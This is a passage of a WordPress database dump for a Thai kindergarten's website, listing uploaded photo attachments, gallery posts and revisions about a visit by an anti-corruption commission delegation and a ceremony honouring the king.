(599,1,'2025-07-14 10:11:03','2025-07-14 03:11:03','','517408980_122237076290202781_2399483217391122872_n','','inherit','open','closed','','517408980_122237076290202781_2399483217391122872_n','','','2025-07-14 10:11:03','2025-07-14 03:11:03','',598,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517408980_122237076290202781_2399483217391122872_n.jpg',0,'attachment','image/jpeg',0),
(600,1,'2025-07-14 10:11:39','2025-07-14 03:11:39','','516278598_122237076302202781_3530110155043035331_n','','inherit','open','closed','','516278598_122237076302202781_3530110155043035331_n','','','2025-07-14 10:11:39','2025-07-14 03:11:39','',598,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/516278598_122237076302202781_3530110155043035331_n.jpg',0,'attachment','image/jpeg',0),
(601,1,'2025-07-14 10:11:39','2025-07-14 03:11:39','','517173392_122237076476202781_570074520042229863_n','','inherit','open','closed','','517173392_122237076476202781_570074520042229863_n','','','2025-07-14 10:11:39','2025-07-14 03:11:39','',598,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517173392_122237076476202781_570074520042229863_n.jpg',0,'attachment','image/jpeg',0),
(602,1,'2025-07-14 10:11:39','2025-07-14 03:11:39','','517721289_122237076404202781_2080327603048285591_n','','inherit','open','closed','','517721289_122237076404202781_2080327603048285591_n','','','2025-07-14 10:11:39','2025-07-14 03:11:39','',598,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517721289_122237076404202781_2080327603048285591_n.jpg',0,'attachment','image/jpeg',0),
(603,1,'2025-07-14 10:11:40','2025-07-14 03:11:40','','517984456_122237076458202781_7761333788282518884_n','','inherit','open','closed','','517984456_122237076458202781_7761333788282518884_n','','','2025-07-14 10:11:40','2025-07-14 03:11:40','',598,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517984456_122237076458202781_7761333788282518884_n.jpg',0,'attachment','image/jpeg',0),
(604,1,'2025-07-14 10:11:40','2025-07-14 03:11:40','','518069309_122237076422202781_5168176646363493549_n','','inherit','open','closed','','518069309_122237076422202781_5168176646363493549_n','','','2025-07-14 10:11:40','2025-07-14 03:11:40','',598,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518069309_122237076422202781_5168176646363493549_n.jpg',0,'attachment','image/jpeg',0),
(605,1,'2025-07-14 10:11:40','2025-07-14 03:11:40','','517408980_122237076290202781_2399483217391122872_n','','inherit','open','closed','','517408980_122237076290202781_2399483217391122872_n-2','','','2025-07-14 10:11:40','2025-07-14 03:11:40','',598,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517408980_122237076290202781_2399483217391122872_n-1.jpg',0,'attachment','image/jpeg',0),
(606,1,'2025-07-14 10:11:42','2025-07-14 03:11:42','','518245601_122237076614202781_1845369519904074883_n','','inherit','open','closed','','518245601_122237076614202781_1845369519904074883_n','','','2025-07-14 10:11:42','2025-07-14 03:11:42','',598,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518245601_122237076614202781_1845369519904074883_n.jpg',0,'attachment','image/jpeg',0),
(607,1,'2025-07-14 10:11:48','2025-07-14 03:11:48','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":600,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516278598_122237076302202781_3530110155043035331_n-1024x769.jpg\" alt=\"\" class=\"wp-image-600\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":601,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517173392_122237076476202781_570074520042229863_n-1024x684.jpg\" alt=\"\" class=\"wp-image-601\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":605,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517408980_122237076290202781_2399483217391122872_n-1-724x1024.jpg\" alt=\"\" class=\"wp-image-605\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":602,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517721289_122237076404202781_2080327603048285591_n-1024x815.jpg\" alt=\"\" class=\"wp-image-602\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":603,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517984456_122237076458202781_7761333788282518884_n-1024x697.jpg\" alt=\"\" class=\"wp-image-603\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":604,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518069309_122237076422202781_5168176646363493549_n-1024x674.jpg\" alt=\"\" class=\"wp-image-604\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":606,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518245601_122237076614202781_1845369519904074883_n-1024x769.jpg\" alt=\"\" class=\"wp-image-606\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','วันที่ 7 กรกฏาคม 2568 โรงเรียนอนุบาลวัดพระโต ให้การต้อนรับคณะกรรมการจากสำนักงานคณะกรรมการการป้องกันและปราบปรามการทุจริตแห่งชาติ ประจำจังหวัดศรีสะเกษ','','inherit','closed','closed','','598-revision-v1','','','2025-07-14 10:11:48','2025-07-14 03:11:48','',598,'http://watprato.ssk.in.th/?p=607',0,'revision','',0),
(608,1,'2025-07-14 10:20:52','2025-07-14 03:20:52','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":609,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516289857_122237171936202781_5799836714853409682_n-1024x651.jpg\" alt=\"\" class=\"wp-image-609\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":610,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516707833_122237172494202781_5110237434292793109_n-1024x649.jpg\" alt=\"\" class=\"wp-image-610\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":613,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517361697_122237172020202781_5575056635419967051_n-1024x740.jpg\" alt=\"\" class=\"wp-image-613\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":611,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517389779_122237171462202781_5813847145994819837_n-725x1024.jpg\" alt=\"\" class=\"wp-image-611\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":614,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517586179_122237172362202781_1752837972981663464_n-1024x664.jpg\" alt=\"\" class=\"wp-image-614\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":612,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517626805_122237172002202781_7210279086706739749_n-1024x768.jpg\" alt=\"\" class=\"wp-image-612\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":615,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517714638_122237172428202781_7045340807892275563_n-1024x689.jpg\" alt=\"\" class=\"wp-image-615\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":616,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517982122_122237171852202781_2511850332074169787_n-1024x714.jpg\" alt=\"\" class=\"wp-image-616\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":618,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518049760_122237172158202781_6302015373935658322_n-1024x976.jpg\" alt=\"\" class=\"wp-image-618\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":617,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518078323_122237172146202781_3649213011814674172_n-1024x679.jpg\" alt=\"\" class=\"wp-image-617\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":619,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518152399_122237171924202781_7608270207764390845_n-1024x693.jpg\" alt=\"\" class=\"wp-image-619\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518193992_122237172416202781_7527918056717933023_n-1024x679.jpg\" alt=\"\" class=\"wp-image-620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":621,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518239002_122237172374202781_9182856373998635626_n-1024x723.jpg\" alt=\"\" class=\"wp-image-621\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":622,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518367310_122237172242202781_6649386908031280053_n-1024x902.jpg\" alt=\"\" class=\"wp-image-622\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":623,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518370205_122237172230202781_2297823551756806775_n-1024x708.jpg\" alt=\"\" class=\"wp-image-623\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โรงเรียนอนุบาลวัดพระโต พร้อมด้วยคณะครูและบุคลากรทางการศึกษาและนักเรียน ร่วมใจถวายพระพรในหลวงรัชกาลที่ 10 พระบาทสมเด็จพระปรเมนทร รามาธิบดีศรีสินทรมหาวชิราลงกรณ พระวชิรเกล้าเจ้าอยู่หัว','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82-12','','','2025-07-14 10:21:06','2025-07-14 03:21:06','',0,'http://watprato.ssk.in.th/?p=608',0,'post','',0),
(609,1,'2025-07-14 10:20:20','2025-07-14 03:20:20','','516289857_122237171936202781_5799836714853409682_n','','inherit','open','closed','','516289857_122237171936202781_5799836714853409682_n','','','2025-07-14 10:20:20','2025-07-14 03:20:20','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/516289857_122237171936202781_5799836714853409682_n.jpg',0,'attachment','image/jpeg',0),
(610,1,'2025-07-14 10:20:21','2025-07-14 03:20:21','','516707833_122237172494202781_5110237434292793109_n','','inherit','open','closed','','516707833_122237172494202781_5110237434292793109_n','','','2025-07-14 10:20:21','2025-07-14 03:20:21','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/516707833_122237172494202781_5110237434292793109_n.jpg',0,'attachment','image/jpeg',0),
(611,1,'2025-07-14 10:20:21','2025-07-14 03:20:21','','517389779_122237171462202781_5813847145994819837_n','','inherit','open','closed','','517389779_122237171462202781_5813847145994819837_n','','','2025-07-14 10:20:21','2025-07-14 03:20:21','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517389779_122237171462202781_5813847145994819837_n.jpg',0,'attachment','image/jpeg',0),
(612,1,'2025-07-14 10:20:21','2025-07-14 03:20:21','','517626805_122237172002202781_7210279086706739749_n','','inherit','open','closed','','517626805_122237172002202781_7210279086706739749_n','','','2025-07-14 10:20:21','2025-07-14 03:20:21','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517626805_122237172002202781_7210279086706739749_n.jpg',0,'attachment','image/jpeg',0),
(613,1,'2025-07-14 10:20:21','2025-07-14 03:20:21','','517361697_122237172020202781_5575056635419967051_n','','inherit','open','closed','','517361697_122237172020202781_5575056635419967051_n','','','2025-07-14 10:20:21','2025-07-14 03:20:21','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517361697_122237172020202781_5575056635419967051_n.jpg',0,'attachment','image/jpeg',0),
(614,1,'2025-07-14 10:20:21','2025-07-14 03:20:21','','517586179_122237172362202781_1752837972981663464_n','','inherit','open','closed','','517586179_122237172362202781_1752837972981663464_n','','','2025-07-14 10:20:21','2025-07-14 03:20:21','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517586179_122237172362202781_1752837972981663464_n.jpg',0,'attachment','image/jpeg',0),
(615,1,'2025-07-14 10:20:23','2025-07-14 03:20:23','','517714638_122237172428202781_7045340807892275563_n','','inherit','open','closed','','517714638_122237172428202781_7045340807892275563_n','','','2025-07-14 10:20:23','2025-07-14 03:20:23','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517714638_122237172428202781_7045340807892275563_n.jpg',0,'attachment','image/jpeg',0),
(616,1,'2025-07-14 10:20:24','2025-07-14 03:20:24','','517982122_122237171852202781_2511850332074169787_n','','inherit','open','closed','','517982122_122237171852202781_2511850332074169787_n','','','2025-07-14 10:20:24','2025-07-14 03:20:24','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/517982122_122237171852202781_2511850332074169787_n.jpg',0,'attachment','image/jpeg',0),
(617,1,'2025-07-14 10:20:24','2025-07-14 03:20:24','','518078323_122237172146202781_3649213011814674172_n','','inherit','open','closed','','518078323_122237172146202781_3649213011814674172_n','','','2025-07-14 10:20:24','2025-07-14 03:20:24','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518078323_122237172146202781_3649213011814674172_n.jpg',0,'attachment','image/jpeg',0),
(618,1,'2025-07-14 10:20:24','2025-07-14 03:20:24','','518049760_122237172158202781_6302015373935658322_n','','inherit','open','closed','','518049760_122237172158202781_6302015373935658322_n','','','2025-07-14 10:20:24','2025-07-14 03:20:24','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518049760_122237172158202781_6302015373935658322_n.jpg',0,'attachment','image/jpeg',0),
(619,1,'2025-07-14 10:20:25','2025-07-14 03:20:25','','518152399_122237171924202781_7608270207764390845_n','','inherit','open','closed','','518152399_122237171924202781_7608270207764390845_n','','','2025-07-14 10:20:25','2025-07-14 03:20:25','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518152399_122237171924202781_7608270207764390845_n.jpg',0,'attachment','image/jpeg',0),
(620,1,'2025-07-14 10:20:25','2025-07-14 03:20:25','','518193992_122237172416202781_7527918056717933023_n','','inherit','open','closed','','518193992_122237172416202781_7527918056717933023_n','','','2025-07-14 10:20:25','2025-07-14 03:20:25','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518193992_122237172416202781_7527918056717933023_n.jpg',0,'attachment','image/jpeg',0),
(621,1,'2025-07-14 10:20:27','2025-07-14 03:20:27','','518239002_122237172374202781_9182856373998635626_n','','inherit','open','closed','','518239002_122237172374202781_9182856373998635626_n','','','2025-07-14 10:20:27','2025-07-14 03:20:27','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518239002_122237172374202781_9182856373998635626_n.jpg',0,'attachment','image/jpeg',0),
(622,1,'2025-07-14 10:20:28','2025-07-14 03:20:28','','518367310_122237172242202781_6649386908031280053_n','','inherit','open','closed','','518367310_122237172242202781_6649386908031280053_n','','','2025-07-14 10:20:28','2025-07-14 03:20:28','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518367310_122237172242202781_6649386908031280053_n.jpg',0,'attachment','image/jpeg',0),
(623,1,'2025-07-14 10:20:28','2025-07-14 03:20:28','','518370205_122237172230202781_2297823551756806775_n','','inherit','open','closed','','518370205_122237172230202781_2297823551756806775_n','','','2025-07-14 10:20:28','2025-07-14 03:20:28','',608,'http://watprato.ssk.in.th/wp-content/uploads/2025/07/518370205_122237172230202781_2297823551756806775_n.jpg',0,'attachment','image/jpeg',0),
(624,1,'2025-07-14 10:20:52','2025-07-14 03:20:52','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":609,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516289857_122237171936202781_5799836714853409682_n-1024x651.jpg\" alt=\"\" class=\"wp-image-609\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":610,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/516707833_122237172494202781_5110237434292793109_n-1024x649.jpg\" alt=\"\" class=\"wp-image-610\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":613,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517361697_122237172020202781_5575056635419967051_n-1024x740.jpg\" alt=\"\" class=\"wp-image-613\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":611,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517389779_122237171462202781_5813847145994819837_n-725x1024.jpg\" alt=\"\" class=\"wp-image-611\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":614,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517586179_122237172362202781_1752837972981663464_n-1024x664.jpg\" alt=\"\" class=\"wp-image-614\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":612,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517626805_122237172002202781_7210279086706739749_n-1024x768.jpg\" alt=\"\" class=\"wp-image-612\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":615,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517714638_122237172428202781_7045340807892275563_n-1024x689.jpg\" alt=\"\" class=\"wp-image-615\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":616,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/517982122_122237171852202781_2511850332074169787_n-1024x714.jpg\" alt=\"\" class=\"wp-image-616\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":618,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518049760_122237172158202781_6302015373935658322_n-1024x976.jpg\" alt=\"\" class=\"wp-image-618\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":617,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518078323_122237172146202781_3649213011814674172_n-1024x679.jpg\" alt=\"\" class=\"wp-image-617\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":619,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518152399_122237171924202781_7608270207764390845_n-1024x693.jpg\" alt=\"\" class=\"wp-image-619\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518193992_122237172416202781_7527918056717933023_n-1024x679.jpg\" alt=\"\" class=\"wp-image-620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":621,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518239002_122237172374202781_9182856373998635626_n-1024x723.jpg\" alt=\"\" class=\"wp-image-621\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":622,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518367310_122237172242202781_6649386908031280053_n-1024x902.jpg\" alt=\"\" class=\"wp-image-622\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":623,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/518370205_122237172230202781_2297823551756806775_n-1024x708.jpg\" alt=\"\" class=\"wp-image-623\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โรงเรียนอนุบาลวัดพระโต พร้อมด้วยคณะครูและบุคลากรทางการศึกษาและนักเรียน ร่วมใจถวายพระพรในหลวงรัชกาลที่ 10 พระบาทสมเด็จพระปรเมนทร รามาธิบดีศรีสินทรมหาวชิราลงกรณ พระวชิรเกล้าเจ้าอยู่หัว','','inherit','closed','closed','','608-revision-v1','','','2025-07-14 10:20:52','2025-07-14 03:20:52','',608,'http://watprato.ssk.in.th/?p=624',0,'revision','',0),
(625,1,'2025-07-14 10:25:05','2025-07-14 03:25:05','<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":626,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565515-1024x643.jpg\" alt=\"\" class=\"wp-image-626\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":627,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565516-1024x796.jpg\" alt=\"\" class=\"wp-image-627\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":631,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565517_0-1024x768.jpg\" alt=\"\" class=\"wp-image-631\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":629,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565519_0-1024x553.jpg\" alt=\"\" class=\"wp-image-629\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":630,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565520_0-1024x768.jpg\" alt=\"\" class=\"wp-image-630\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":628,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565521_0-1024x714.jpg\" alt=\"\" class=\"wp-image-628\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":632,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565522-1024x768.jpg\" alt=\"\" class=\"wp-image-632\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":633,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565523-1024x768.jpg\" alt=\"\" class=\"wp-image-633\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":634,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565526-1024x673.jpg\" alt=\"\" class=\"wp-image-634\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":636,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565532-1024x769.jpg\" alt=\"\" class=\"wp-image-636\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":635,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565533-1006x1024.jpg\" alt=\"\" class=\"wp-image-635\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":638,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565534-1024x876.jpg\" alt=\"\" class=\"wp-image-638\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":639,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565535-1024x768.jpg\" alt=\"\" class=\"wp-image-639\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":637,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565536-1024x768.jpg\" alt=\"\" class=\"wp-image-637\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":640,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565537_0-1024x768.jpg\" alt=\"\" class=\"wp-image-640\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":641,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565539_0-1024x768.jpg\" alt=\"\" class=\"wp-image-641\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":642,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565540_0-1024x768.jpg\" alt=\"\" class=\"wp-image-642\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":643,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/07/S__28565541-1024x768.jpg\" alt=\"\" class=\"wp-image-643\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":644,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img 